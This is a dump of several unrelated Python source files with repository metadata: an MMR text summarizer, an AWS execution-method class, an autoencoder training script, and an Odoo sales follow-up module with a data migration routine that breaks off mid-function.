hypothesis = ""
word_count = []
pair_similarity = []
summary_string = []
def count_word(index):
global doc
Doc = nl(doc[index])
tokens = [t.text for t in Doc]
tokens = [t for t in tokens if len(t.translate(t.maketrans('', '', string.punctuation + string.whitespace))) > 0] # + string.digits
return len(tokens)
def store_word_count():
global word_count,doc
word_count = []
for i in range(0,len(doc)):
word_count.append(count_word(i))
def maximum(index, toPrint=0):
global summary, pair_similarity
length = len(summary)
if(length!=0):
max=0
for i in range(length):
a=pair_similarity[index][summary[i]]
if(a>max):
max=a
if toPrint:
print(str(summary[i])+" -> "+str(a))
return max
else:
return 0
def count_sum(summary):
sum=0
length = len(summary)
for i in range(length):
sum+=count_word(summary[i])
return sum
def mmr_sorted(lambda_, doc, length):
global word_count, pair_similarity, summary
#print('Inside MMR')
print(length)
l3 = []
vectorizer = TfidfVectorizer(smooth_idf=False)
X = vectorizer.fit_transform(doc)
y = X.toarray()
rows = y.shape[0]
cols = y.shape[1]
pair_similarity = []
for i in range(rows):
max=-1
pair_similarity.append([])
for j in range(rows):
if(j!=i):
a = np.sum(np.multiply(y[i],y[j]))
pair_similarity[-1].append(a)
if(a>max):
max=a
else:
pair_similarity[-1].append(1)
l3.append(max)
store_word_count()
l = len(doc)
count = 0
last = -1
summary = []
summary_word_count = 0
while(1):
if (summary_word_count < length):
max=-1
for i in range(l):
a = maximum(i)
mmrscore = lambda_*l3[i] - (1-lambda_)*a
if(mmrscore >= max):
max = mmrscore
ind = i
summary.append(ind)
summary_word_count += word_count[ind]
else:
#print('Bye')
break
def listToString():
global summary_string, word_count, hypothesis, summary, doc
summary_string = []
leng = 0
for i in summary:
if doc[i] not in summary_string:
summary_string.append(doc[i])
leng += word_count[i]
hypothesis = "".join(summary_string)
parser = argparse.ArgumentParser()
parser.add_argument('--data_path', default = 'data/text/', type = str, help = 'Folder containing textual data')
parser.add_argument('--summary_path', default = 'data/summaries/', type = str, help = 'Folder to store features of the textual data')
parser.add_argument('--length_file', default = 'data/length.txt', type = str, help = 'Path to file containing summary length')
args = parser.parse_args()
print('Generating summary in ...'+args.summary_path)
num_docs = len(os.listdir(args.data_path))
X1 = pd.read_csv(args.length_file, sep="\t", header=None)
for i in tqdm(range(0,num_docs)):
length1=X1[1][i]
#length2=X2[1][i]
doc = []
with open(os.path.join(args.data_path,X1[0][i]), 'r') as file:
for x in file:
if x != '\n':
doc.append(x)
lamda=0.6
#for j in lamda:
mmr_sorted(lamda,doc,length1)
listToString()
f= open(os.path.join(args.summary_path,X1[0][i]),"w+")
n = f.write(hypothesis)
f.close()
hypothesis=""
| Law-AI/summarization | extractive/MMR/MMR.py | MMR.py | py | 4,098 | python | en | code | 139 | github-code | 36 | [
{
"api_name": "spacy.lang.en.English",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "string.punctuation",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "string.whitespace",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "... |
11936036688 | from typing import Any, Optional, TYPE_CHECKING
import logging
from ..common.utils import deepmerge
from .execution_method import ExecutionMethod
from .aws_settings import INFRASTRUCTURE_TYPE_AWS, AwsSettings
if TYPE_CHECKING:
from ..models import (
Task,
TaskExecution
)
logger = logging.getLogger(__name__)
class AwsBaseExecutionMethod(ExecutionMethod):
def __init__(self, name: str,
task: Optional['Task'] = None,
task_execution: Optional['TaskExecution'] = None,
aws_settings: Optional[dict[str, Any]] = None) -> None:
super().__init__(name, task=task,
task_execution=task_execution)
if aws_settings is None:
self.aws_settings = self.merge_aws_settings(task=task,
task_execution=task_execution)
else:
self.aws_settings = AwsSettings.parse_obj(aws_settings)
@staticmethod
def merge_aws_settings(task: Optional['Task'],
task_execution: Optional['TaskExecution']) -> AwsSettings:
settings_to_merge: list[dict[str, Any]] = [ {} ]
if task:
if task.run_environment.aws_settings:
settings_to_merge.append(task.run_environment.aws_settings)
if task.infrastructure_settings and \
(task.infrastructure_type == INFRASTRUCTURE_TYPE_AWS):
settings_to_merge.append(task.infrastructure_settings)
if task_execution and task_execution.infrastructure_settings and \
(task_execution.infrastructure_type == INFRASTRUCTURE_TYPE_AWS):
settings_to_merge.append(task_execution.infrastructure_settings)
return AwsSettings.parse_obj(deepmerge(*settings_to_merge))
def compute_region(self) -> Optional[str]:
region = self.aws_settings.region
if (not region) and self.task:
infra = self.task.infrastructure_settings
if infra and (self.task.infrastructure_type == INFRASTRUCTURE_TYPE_AWS):
region = infra.get('region')
if (not region) and infra.get('network'):
region = infra['network'].get('region')
if not region:
run_environment = self.task.run_environment
re_aws_settings = run_environment.aws_settings
if re_aws_settings:
region = re_aws_settings.get('region')
if (not region) and re_aws_settings.get('network'):
region = re_aws_settings['network'].get('region')
return region
def enrich_task_settings(self) -> None:
if not self.task:
raise RuntimeError("enrich_task_settings(): No Task found")
aws_settings_dict = self.task.infrastructure_settings
if aws_settings_dict:
aws_settings = AwsSettings.parse_obj(aws_settings_dict)
aws_settings.update_derived_attrs(execution_method=self)
self.task.infrastructure_settings = deepmerge(
aws_settings_dict, aws_settings.dict())
# TODO: scheduling URLs
def enrich_task_execution_settings(self) -> None:
if not self.task_execution:
raise RuntimeError("enrich_task_execution_settings(): No Task Execution found")
aws_settings_dict = self.task_execution.infrastructure_settings
if aws_settings_dict:
aws_settings = AwsSettings.parse_obj(aws_settings_dict)
aws_settings.update_derived_attrs(execution_method=self)
self.task_execution.infrastructure_settings = deepmerge(
aws_settings_dict, aws_settings.dict())
| CloudReactor/task_manager | server/processes/execution_methods/aws_base_execution_method.py | aws_base_execution_method.py | py | 3,685 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.TYPE_CHECKING",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "logging.getLogger",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "execution_method.ExecutionMethod",
"line_number": 19,
"usage_type": "name"
},
{
"api_name":... |
3219242168 | import sys
sys.path.append('../VQ-VAE')
from auto_encoder2 import VQ_CVAE
import argparse
from torch import optim
from torchvision import transforms
import fpa_dataset
parser = argparse.ArgumentParser(description='Train an autoencoder for hand depth image reconstruction')
parser.add_argument('-r', dest='dataset_root_folder', required=True, help='Root folder for dataset')
parser.add_argument('--split-filename', default='', help='Dataset split filename')
parser.add_argument('-e', dest='num_epochs', type=int, required=True,
help='Total number of epochs to train')
parser.add_argument('--use-cuda', dest='use_cuda', action='store_true', default=False,
help='Whether to use cuda for training')
parser.add_argument('-l', dest='epoch_log', type=int, default=10,
help='Total number of epochs to train')
parser.add_argument('--batch-size', type=int, default=1, help='Batch size')
args = parser.parse_args()
args.use_cuda = True
transform_depth = transforms.Compose([transforms.ToTensor()])
lr = 2e-4
d = 128
k = 256
num_channels_in = 1
num_channels_out = 1
model = VQ_CVAE(d=d, k=k, num_channels_in=num_channels_in, num_channels_out=num_channels_out)
if args.use_cuda:
model = model.cuda()
optimizer = optim.Adam(model.parameters(), lr=lr)
scheduler = optim.lr_scheduler.StepLR(optimizer, 10, 0.5)
train_loader = fpa_dataset.DataLoaderTracking(root_folder=args.dataset_root_folder,
type='train', transform_color=None,
transform_depth=transform_depth,
batch_size=args.batch_size,
split_filename=args.split_filename,)
for epoch_idx in range(args.num_epochs - 1):
epoch = epoch_idx + 1
continue_batch_end_ix = -1
for batch_idx, (data, _) in enumerate(train_loader):
if batch_idx < continue_batch_end_ix:
print('Continuing... {}/{}'.format(batch_idx, continue_batch_end_ix))
continue
optimizer.zero_grad()
if args.use_cuda:
data = data.cuda()
outputs = model(data)
loss = model.loss_function(data, *outputs)
loss.backward()
optimizer.step()
a = 0 | pauloabelha/handy | train_autoencoder.py | train_autoencoder.py | py | 2,275 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 2,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "torchvision.transf... |
8755383285 | # -*- coding: utf-8 -*-
import json
import logging
from datetime import datetime, date, timedelta
from odoo import api, fields, models
from odoo.addons.muk_dms.models import dms_base
logger = logging.getLogger('FOLLOW-UP')
AVAILABLE_PRIORITIES = [
('0', u'Normale'),
('1', u'Basse'),
('2', u'Haute'),
('3', u'Très haute'),
]
class OFFollowupProject(models.Model):
_name = 'of.followup.project'
_inherit = 'mail.thread'
_description = "Suivi des projets"
_order = "priority desc, reference_laying_date, id desc"
@api.model
def _init_group_of_followup_project_not_migrated(self):
# On utilise une fonction déclenchée par le XML plutôt qu'un auto_init, car au moment de l'auto_init le groupe
# n'existe pas encore.
# Si la migration n'a pas été faite, ajouter le groupe group_of_followup_project_not_migrated à
# tous les utilisateurs
if not self.env['ir.config_parameter'].sudo().get_param('of.followup.migration', False):
group_not_migrated = self.env.ref('of_followup.group_of_followup_project_not_migrated')
group_user = self.env.ref('base.group_user')
if group_not_migrated not in group_user.implied_ids:
group_user.write({'implied_ids': [(4, group_not_migrated.id)]})
def _get_order_values(
self, project, mapping_project_tags, default_of_kanban_step_id, done_of_kanban_step_id,
in_progress_of_kanban_step_id):
"""Helper that return a dict of values to write on a Sale depending of the Project followup"""
otag_ids = []
if project.tag_ids:
otag_ids = [mapping_project_tags[pt.id] for pt in project.tag_ids]
kanban_step_id = in_progress_of_kanban_step_id
if project.state in ('done', 'cancel'):
kanban_step_id = done_of_kanban_step_id
elif not project.reference_laying_date:
kanban_step_id = default_of_kanban_step_id
if not kanban_step_id:
kanban_step_id = default_of_kanban_step_id
return {
'of_priority': project.priority,
'of_notes': project.notes,
'of_info': project.info,
'of_manual_laying_date': project.manual_laying_date,
'of_laying_week': project.laying_week,
'of_reference_laying_date': project.reference_laying_date,
'of_force_laying_date': project.force_laying_date,
'of_sale_followup_tag_ids': otag_ids,
'of_kanban_step_id': kanban_step_id
}
def _update_tables_from_sale_values(self, order_values_to_upd):
def _get_sql_set_string(values):
order_obj = self.env['sale.order']
sql_set_str = ""
len_values = len(values)
for i, (k, v) in enumerate(values.items(), 1):
separator = ', ' if i < len_values else ' '
if not v and order_obj._fields[k].type in ['char', 'text', 'selection', 'date']:
sql_set_str += "%s = %s%s" % (k, 'NULL', separator)
elif v and (order_obj._fields[k].type in ['char', 'text'] or isinstance(v, (str, unicode))):
sql_set_str += "%s = '%s'%s" % (k, v.replace("'", "''"), separator)
else:
sql_set_str += "%s = %s%s" % (k, v, separator)
return sql_set_str
for order_id, order_values in order_values_to_upd.items():
partner_id = order_values.pop('partner_id')
followup_tags_ids = order_values.pop('of_sale_followup_tag_ids')
activities = order_values.pop('of_crm_activity_ids') if 'of_crm_activity_ids' in order_values else []
order_upd_sql = "UPDATE sale_order " \
"SET %s" \
"WHERE id = %s" % (_get_sql_set_string(order_values), order_id)
# update the columns of the sale_order
self._cr.execute(order_upd_sql)
# insert the tags in the relation table of the M2M
for tag_id in followup_tags_ids:
self._cr.execute(
'INSERT INTO sale_order_followup_tag_rel (order_id, tag_id) VALUES (%s, %s)',
(order_id, tag_id)
)
# insert the activities linked to the Sale in their table
for activity in activities:
self._cr.execute(
'INSERT INTO "of_crm_activity" ("create_uid", "uploaded_attachment_id", "type_id", '
'"user_id", "vendor_id", "description", "deadline_date", "sequence", "order_id", '
'"title", "write_uid", "state", "write_date", "report", "create_date", "load_attachment", '
'"origin", "active", "partner_id", "trigger_type") VALUES '
'(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, now(), %s, now(), %s, %s, %s, %s, %s);',
(
activity['create_uid'], None, activity['activity_id'], activity['create_uid'],
activity['vendor_id'], activity['summary'], activity['date_deadline'] or None,
activity['sequence'], order_id, activity['summary'] or None, activity['write_uid'],
activity['state'], None, False, 'sale_order', True, partner_id, 'at_creation'
)
)
def _followup_data_migration(self):
"""
Migration of the Project followup data into the new fields of the linked Order.
Migration of Project followup task and other stuff in the CRM activities, CRM tags, etc.
"""
cr = self._cr
# Follow-up data migration
ir_config_obj = self.env['ir.config_parameter']
logger.info('_followup_data_migration START')
if not ir_config_obj.get_param('of.followup.migration', False):
self = self.with_context(lang='fr_FR')
crm_activity_obj = self.env['crm.activity']
followup_task_obj = self.env['of.followup.task']
followup_task_type_obj = self.env['of.followup.task.type']
followup_project_obj = self.env['of.followup.project']
sale_followup_tag_obj = self.env['of.sale.followup.tag']
followup_project_tag_obj = self.env['of.followup.project.tag']
sale_order_kanban_obj = self.env['of.sale.order.kanban']
# of.followup.project.tag -> of.sale.followup.tag
logger.info(' of.followup.project.tag -> of.sale.followup.tag')
project_tags = followup_project_tag_obj.search([])
mapping_project_tags = {ptag.id: sale_followup_tag_obj.create(
{'name': ptag.name, 'color': ptag.color}).id for ptag in project_tags}
# of.followup.task.type -> crm.activity (loaded via data XML) so we build a data mapping dict
logger.info(' of.followup.task.type -> crm.activity')
task_type_planif_id = self.env.ref('of_followup.of_followup_task_type_planif').id
task_type_vt_id = self.env.ref('of_followup.of_followup_task_type_vt').id
followup_type_values = followup_task_type_obj.with_context(active_test=False).search_read(
['|', ('predefined_task', '=', False), ('id', 'in', [task_type_planif_id, task_type_vt_id])],
['name', 'short_name'])
mapping_task_type = {}
for data in followup_type_values:
act_id = crm_activity_obj.create(
{'name': data['name'], 'of_short_name': data['short_name'], 'of_object': 'sale_order'}).id
k = '%s,%s' % (data['id'], data['short_name'])
mapping_task_type[k] = act_id
# of.followup.task -> of.crm.activity
logger.info(' of.followup.task -> of.crm.activity')
# get the tasks ids
tasks_query = "SELECT DISTINCT(OFT.id) " \
"FROM of_followup_task OFT " \
"INNER JOIN of_followup_project OFP ON OFP.id = OFT.project_id " \
"INNER JOIN of_followup_task_type OFTT ON OFTT.id = OFT.type_id " \
"WHERE OFTT.predefined_task IS NOT TRUE OR OFT.type_id IN %s;"
cr.execute(tasks_query, (tuple([task_type_planif_id, task_type_vt_id]),))
tasks_ids = cr.fetchall()
tasks_ids = map(lambda t: t[0], tasks_ids)
# create sales activities from followup tasks and prepare orders data from the project linked to the task
project_data = {}
for task in followup_task_obj.browse(tasks_ids):
project = task.project_id
type_id = task.type_id.id
partner_id = project.order_id.partner_id.id or False
short_name = task.type_id.short_name
k = '%s,%s' % (type_id, short_name)
activity_state = 'planned' # default value
if task.state_id.final_state:
activity_state = 'done'
if project:
if not project_data.get(project):
project_data[project] = {'partner_id': partner_id, 'of_crm_activity_ids': []}
# try to preload the deadline date dependings on the current follow-up's stage
date_deadline = False
if project.reference_laying_date:
stage_code_tr = {
's': 0,
's+': 1,
's-2': -2,
's-4': -4,
's-6': -6,
's-8': -8
}
reference_laying_date = datetime.strptime(project.reference_laying_date, '%Y-%m-%d')
task_stage = task.state_id.stage_id
if task_stage and stage_code_tr.get(task_stage.code):
days_nbr = stage_code_tr.get(task_stage.code) * 7
date_deadline = reference_laying_date + timedelta(days=days_nbr)
# take the start day of the week for this date
start_date = date_deadline - timedelta(days=date_deadline.weekday())
date_deadline = start_date.strftime('%Y-%m-%d')
if mapping_task_type.get(k):
project_data[project]['of_crm_activity_ids'].append({
'sequence': task.sequence,
'summary': task.name,
'date_deadline': date_deadline,
'activity_id': mapping_task_type.get(k),
'state': activity_state,
'user_id': task.project_id.user_id.id or None,
'vendor_id': task.project_id.vendor_id.id or None,
'create_uid': task.create_uid.id or None,
'write_uid': task.write_uid.id or None
})
order_values_to_upd = {}
# of.followup.project -> sale.order
logger.info(' of.followup.project -> sale.order')
done_project_ids = []
default_of_kanban_step_id = self.env.ref('of_sale_kanban.of_sale_order_kanban_new').id
done_of_kanban_step_id = sale_order_kanban_obj.search([('name', '=', u"Terminé")]).id
in_progress_of_kanban_step_id = sale_order_kanban_obj.search([('name', '=', u"En cours")]).id
for project, data in project_data.items():
values = self._get_order_values(
project, mapping_project_tags, default_of_kanban_step_id, done_of_kanban_step_id,
in_progress_of_kanban_step_id)
values.update(data)
order_values_to_upd[project.order_id.id] = values
done_project_ids.append(project.id)
# other projets that aren't yet migrated from the followup tasks
if done_project_ids:
projects_query = "SELECT DISTINCT(OFP.id) " \
"FROM of_followup_project OFP " \
"WHERE OFP.id NOT IN %s;"
cr.execute(projects_query, (tuple(done_project_ids),))
else:
projects_query = "SELECT DISTINCT(OFP.id) FROM of_followup_project OFP;"
cr.execute(projects_query)
project_ids = cr.fetchall()
project_ids = map(lambda p: p[0], project_ids)
followup_projects = followup_project_obj.browse(project_ids)
for project in followup_projects:
values = self._get_order_values(
project, mapping_project_tags, default_of_kanban_step_id, done_of_kanban_step_id,
in_progress_of_kanban_step_id)
values['partner_id'] = project.order_id.partner_id.id
order_values_to_upd[project.order_id.id] = values
self._update_tables_from_sale_values(order_values_to_upd)
# recompute follow-up fields
logger.info(' recompute follow-up fields')
order_ids = order_values_to_upd.keys()
orders = self.env['sale.order'].browse(order_ids)
orders._compute_of_activities_state()
# set the migration as done
ir_config_obj.set_param('of.followup.migration', 'True')
# Deactivate view to hide migration button
self.env.ref('of_followup.view_sales_config_settings_followup').active = False
# Retirer le groupe group_of_followup_project_not_migrated pour masquer les différents éléments du suivi
group_not_migrated = self.env.ref('of_followup.group_of_followup_project_not_migrated')
group_user = self.env.ref('base.group_user')
if group_not_migrated in group_user.implied_ids:
group_user.write({'implied_ids': [(3, group_not_migrated.id)]})
logger.info('_followup_data_migration END')
stage_id = fields.Many2one(
compute='_compute_stage_id', comodel_name='of.followup.project.stage', string=u"Etape de suivi", store=True,
group_expand='_read_group_stage_ids')
state = fields.Selection(
[('in_progress', u'En cours'),
('late', u'En retard'),
('ready', u'Prêt'),
('done', u'Terminé'),
('cancel', u'Annulé')],
string=u"Etat du dossier", compute='_compute_state', store=True)
is_done = fields.Boolean(string=u"Est terminé")
is_canceled = fields.Boolean(string=u"Est annulé")
order_id = fields.Many2one(
comodel_name='sale.order', string=u"Commande", required=True, copy=False, ondelete='cascade')
partner_id = fields.Many2one(related='order_id.partner_id', string=u"Client", readonly=True)
intervention_address_id = fields.Many2one(
related='order_id.partner_shipping_id', string=u"Adresse d'intervention", readonly=True)
invoice_status = fields.Selection(related='order_id.invoice_status', string=u"État de facturation", readonly=True)
user_id = fields.Many2one(comodel_name='res.users', string=u"Responsable", default=lambda self: self.env.user)
vendor_id = fields.Many2one(related='order_id.user_id', string=u"Vendeur", readonly=True)
reference_laying_date = fields.Date(
compute='_compute_reference_laying_date', string=u"Date de pose de référence", store=True, compute_sudo=True)
force_laying_date = fields.Boolean(string=u"Forcer la date de pose")
manual_laying_date = fields.Date(string=u"Date de pose (manuelle)")
laying_week = fields.Char(
compute='_compute_reference_laying_date', string=u"Semaine de pose", store=True, compute_sudo=True)
task_ids = fields.One2many(comodel_name='of.followup.task', inverse_name='project_id', string=u"Tâches")
predefined_task_ids = fields.One2many(
comodel_name='of.followup.task', inverse_name='project_id', string=u"Tâches pré-définies",
domain=[('predefined_task', '=', True)])
other_task_ids = fields.One2many(
comodel_name='of.followup.task', inverse_name='project_id', string=u"Autres tâches",
domain=[('predefined_task', '=', False)])
template_id = fields.Many2one(comodel_name='of.followup.project.template', string=u"Modèle")
color = fields.Char(string=u"Couleur", compute="_compute_color")
priority = fields.Selection(
AVAILABLE_PRIORITIES, string=u'Priorité', index=True, default=AVAILABLE_PRIORITIES[0][0])
main_product_brand_id = fields.Many2one(
comodel_name='of.product.brand', compute='_compute_main_product_brand_id',
string=u"Marque de l'article principal", store=True)
info = fields.Text(string=u"Infos")
notes = fields.Text(string=u"Notes")
tag_ids = fields.Many2many(comodel_name='of.followup.project.tag', string=u"Étiquettes")
alert_ids = fields.Many2many(
comodel_name='of.followup.project.alert', string=u"Alertes", compute='_compute_alert_ids')
invoice_count = fields.Integer(string=u"Nombre de factures", related='order_id.invoice_count', readonly=True)
purchase_count = fields.Integer(string=u"Nombre d'achats", related='order_id.purchase_count', readonly=True)
intervention_count = fields.Integer(
string=u"Nombre d'interventions", related='order_id.intervention_count', readonly=True)
to_schedule_count = fields.Integer(
string=u"Nombre de DI à programmer", related='order_id.of_service_count', readonly=True)
delivery_count = fields.Integer(string=u"Nombre de livraisons", related='order_id.delivery_count', readonly=True)
picking_count = fields.Integer(string=u"Nombre de réceptions", compute='_compute_picking_count')
# Champs pour affichage vignette kanban
late_tasks_number = fields.Char(string=u"Nombre de tâches en retard", compute='_compute_late_tasks_number')
late_tasks = fields.Text(string=u"Tâches en retard", compute='_compute_late_tasks')
info_display = fields.Text(string=u"Infos pour affichage", compute='_compute_info_display')
date_alert_display = fields.Text(string=u"Infos pour alerte de dates", compute='_compute_alert_display')
picking_alert_display = fields.Text(
string=u"Infos pour alerte de livraison/réception", compute='_compute_alert_display')
amount_untaxed = fields.Monetary(string=u"Montant HT", related='order_id.amount_untaxed', readonly=True)
currency_id = fields.Many2one('res.currency', string=u"Devise", related='order_id.currency_id', readonly=True)
_sql_constraints = [('order_uniq', 'unique (order_id)', u"Un suivi a déjà été créé pour cette commande !")]
@api.multi
def name_get(self):
res = []
for followup in self:
name = "Suivi commande %s" % followup.order_id.name
res.append((followup.id, name))
return res
@api.model
def _read_group_stage_ids(self, stages, domain, order):
stage_ids = self.env['of.followup.project.stage'].search([])
return stage_ids
@api.multi
@api.depends('reference_laying_date', 'state')
def _compute_stage_id(self):
for rec in self:
if rec.state in ('done', 'cancel'):
rec.stage_id = self.env['of.followup.project.stage'].search([('code', '=', 'done')], limit=1)
else:
laying_date = rec.reference_laying_date
if laying_date:
laying_date = datetime.strptime(laying_date, "%Y-%m-%d").date()
today = date.today()
if laying_date < today:
rec.stage_id = self.env['of.followup.project.stage'].search([('code', '=', 's+')], limit=1)
else:
monday1 = (laying_date - timedelta(days=laying_date.weekday()))
monday2 = (today - timedelta(days=today.weekday()))
week_diff = (monday1 - monday2).days / 7
rec.stage_id = self.env['of.followup.project.stage'].search(
[('week_diff_min', '<=', week_diff), ('week_diff_max', '>=', week_diff)], limit=1)
else:
rec.stage_id = self.env['of.followup.project.stage'].search([('code', '=', 'new')], limit=1)
@api.multi
@api.depends('order_id', 'order_id.state', 'is_done', 'is_canceled', 'task_ids', 'task_ids.is_not_processed',
'task_ids.is_done', 'task_ids.is_late')
def _compute_state(self):
for rec in self:
# Si commande annulée, le suivi est à l'état annulé également
if rec.order_id.state == 'cancel':
rec.state = 'cancel'
else:
# Par défaut le projet est en cours
state = 'in_progress'
if rec.is_done:
# Le projet a été marqué comme terminé
state = 'done'
elif rec.is_canceled:
# Le projet a été marqué comme annulé
state = 'cancel'
else:
# Correction d'un bug sur l'ordre de calcul des champs compute : Pour savoir si des tâches
# sont réellement en retard, il faut recalculer l'étape du suivi au préalable
rec.state = state
rec._compute_stage_id()
# Toutes les tâches sont terminées (excepté les non traitées)
if rec.task_ids and not rec.task_ids.filtered(lambda t: not t.is_not_processed and not t.is_done):
state = 'ready'
# Au moins une tâche est en retard
elif rec.task_ids.filtered(lambda t: t.is_late):
state = 'late'
rec.state = state
@api.multi
@api.depends('force_laying_date', 'manual_laying_date', 'order_id', 'order_id.intervention_ids',
'order_id.intervention_ids.date', 'order_id.intervention_ids.tache_id',
'order_id.intervention_ids.tache_id.tache_categ_id')
def _compute_reference_laying_date(self):
for rec in self:
laying_date = False
if rec.force_laying_date:
laying_date = rec.manual_laying_date
elif rec.order_id and rec.order_id.intervention_ids:
planif_task_type = self.env.ref('of_followup.of_followup_task_type_planif')
if planif_task_type:
planif_planning_tache_categs = planif_task_type.planning_tache_categ_ids
interventions = rec.order_id.intervention_ids.filtered(
lambda i: i.tache_id.tache_categ_id.id in planif_planning_tache_categs.ids and
i.date > fields.Datetime.now())
if interventions:
laying_date = interventions[0].date_date
else:
interventions = rec.order_id.intervention_ids.filtered(
lambda i: i.tache_id.tache_categ_id.id in planif_planning_tache_categs.ids)
if interventions:
laying_date = interventions[-1].date_date
rec.reference_laying_date = laying_date
if laying_date:
laying_week = datetime.strptime(laying_date, "%Y-%m-%d").date().isocalendar()[1]
rec.laying_week = "%02d" % laying_week
else:
rec.laying_week = "Non programmée"
@api.multi
def _compute_color(self):
for rec in self:
state = rec.state
if state == 'in_progress':
color = '#ffffff'
elif state == 'late':
color = '#ffa8a8'
elif state == 'ready':
color = '#bcffa8'
elif state == 'done':
color = '#d7d7d7'
elif state == 'cancel':
color = '#eeeeee'
else:
color = '#ffffff'
rec.color = color
@api.multi
@api.depends('order_id', 'order_id.order_line', 'order_id.order_line.of_article_principal',
'order_id.order_line.product_id', 'order_id.order_line.product_id.brand_id')
def _compute_main_product_brand_id(self):
for rec in self:
main_product_lines = rec.order_id.order_line.filtered(lambda l: l.of_article_principal)
if main_product_lines:
rec.main_product_brand_id = main_product_lines[0].product_id.brand_id
@api.multi
def _compute_alert_ids(self):
for rec in self:
if rec.order_id:
alerts = self.env['of.followup.project.alert']
# Vérification des dates
planif_task_type = self.env.ref('of_followup.of_followup_task_type_planif')
if planif_task_type and rec.force_laying_date:
planif_planning_tache_categs = planif_task_type.planning_tache_categ_ids
interventions = rec.order_id.intervention_ids.filtered(
lambda i: i.tache_id.tache_categ_id.id in planif_planning_tache_categs.ids and
i.date > fields.Datetime.now() and i.state != 'cancel')
if interventions:
intervention = interventions[0]
if intervention.date_date != rec.manual_laying_date:
alerts |= self.env.ref('of_followup.of_followup_project_alert_date')
else:
interventions = rec.order_id.intervention_ids.filtered(
lambda i:
i.tache_id.tache_categ_id.id in planif_planning_tache_categs.ids and i.state != 'cancel')
if interventions:
intervention = interventions[-1]
if intervention.date_date != rec.manual_laying_date:
alerts |= self.env.ref('of_followup.of_followup_project_alert_date')
# Vérification BL
if rec.order_id.picking_ids:
late_delivery_pickings = rec.order_id.picking_ids.filtered(
lambda p: p.state not in ['done', 'cancel'] and p.min_date < fields.Datetime.now())
if late_delivery_pickings:
alerts |= self.env.ref('of_followup.of_followup_project_alert_bl')
# Vérification BR
if rec.order_id.purchase_ids.mapped('picking_ids'):
late_receipt_pickings = rec.order_id.purchase_ids.mapped('picking_ids').filtered(
lambda p: p.state not in ['done', 'cancel'] and p.min_date < fields.Datetime.now())
if late_receipt_pickings:
alerts |= self.env.ref('of_followup.of_followup_project_alert_br')
rec.alert_ids = alerts
@api.multi
def _compute_picking_count(self):
for rec in self:
rec.picking_count = sum(rec.order_id.purchase_ids.mapped('picking_count'))
@api.multi
def _compute_late_tasks_number(self):
for rec in self:
rec.late_tasks_number = "(%s/%s)" % (len(rec.task_ids.filtered(lambda t: t.is_late)), len(rec.task_ids))
@api.multi
def _compute_late_tasks(self):
for rec in self:
late_tasks = []
for late_task in rec.task_ids.filtered(lambda t: t.is_late):
if len(late_tasks) < 3:
late_tasks.append(late_task.type_id.short_name)
else:
late_tasks.append("...")
break
rec.late_tasks = json.dumps(late_tasks) if late_tasks else False
@api.multi
def _compute_info_display(self):
for rec in self:
info = []
if rec.info:
for line in rec.info.split('\n'):
info.append(line)
rec.info_display = json.dumps(info) if info else False
@api.multi
def _compute_alert_display(self):
alert_date = self.env.ref('of_followup.of_followup_project_alert_date')
for rec in self:
date_alert = []
picking_alert = []
if rec.alert_ids:
for alert in rec.alert_ids:
if alert == alert_date:
date_alert.append(alert.name)
else:
picking_alert.append(alert.name)
rec.date_alert_display = json.dumps(date_alert) if date_alert else False
rec.picking_alert_display = json.dumps(picking_alert) if picking_alert else False
@api.model
def get_color(self):
state = self.state
if state == 'in_progress':
return 1
elif state == 'late':
return 2
elif state == 'ready':
return 3
elif state == 'done':
return 4
else:
return 0
@api.multi
def set_to_done(self):
self.ensure_one()
self.is_done = True
@api.multi
def set_to_canceled(self):
self.ensure_one()
self.is_canceled = True
@api.multi
def set_to_in_progress(self):
self.ensure_one()
self.is_done = False
@api.multi
def action_send_email(self):
self.ensure_one()
ir_model_data = self.env['ir.model.data']
try:
template_id = ir_model_data.get_object_reference('of_followup', 'of_followup_project_email_template')[1]
except ValueError:
template_id = False
try:
compose_form_id = ir_model_data.get_object_reference('mail', 'email_compose_message_wizard_form')[1]
except ValueError:
compose_form_id = False
ctx = dict()
ctx.update({
'default_model': 'of.followup.project',
'default_res_id': self.ids[0],
'default_use_template': bool(template_id),
'default_template_id': template_id,
'default_partner_ids': self.partner_id.ids,
'default_composition_mode': 'comment',
})
return {
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'mail.compose.message',
'views': [(compose_form_id, 'form')],
'view_id': compose_form_id,
'target': 'new',
'context': ctx,
}
@api.onchange('template_id')
def onchange_template_id(self):
if not self.template_id:
return
predefined_new_tasks = []
other_new_tasks = []
for task in self.template_id.task_ids:
vals = {'sequence': task.sequence, 'type_id': task.type_id.id, 'name': task.name}
state = self.env['of.followup.task.type.state'].search(
[('task_type_id', '=', task.type_id.id), ('starting_state', '=', True)], limit=1)
if state:
if task.predefined_task:
vals.update({'predefined_state_id': state.id})
predefined_new_tasks += [(0, 0, vals)]
else:
vals.update({'state_id': state.id})
other_new_tasks += [(0, 0, vals)]
return {'value': {'predefined_task_ids': predefined_new_tasks, 'other_task_ids': other_new_tasks}}
@api.onchange('force_laying_date')
def onchange_force_laying_date(self):
self.manual_laying_date = False
@api.multi
def action_view_invoice(self):
self.ensure_one()
return self.order_id.action_view_invoice()
@api.multi
def action_view_purchase(self):
self.ensure_one()
return self.order_id.action_view_achats()
@api.multi
def action_view_interventions(self):
self.ensure_one()
return self.order_id.action_view_intervention()
@api.multi
def action_view_to_schedule(self):
self.ensure_one()
return self.order_id.action_view_a_programmer()
@api.multi
def action_view_delivery(self):
self.ensure_one()
return self.order_id.action_view_delivery()
@api.multi
def action_view_picking(self):
self.ensure_one()
action = self.env.ref('stock.action_picking_tree')
result = action.read()[0]
result.pop('id', None)
result['context'] = {}
pick_ids = self.order_id.purchase_ids.mapped('picking_ids').ids or []
if len(pick_ids) > 1:
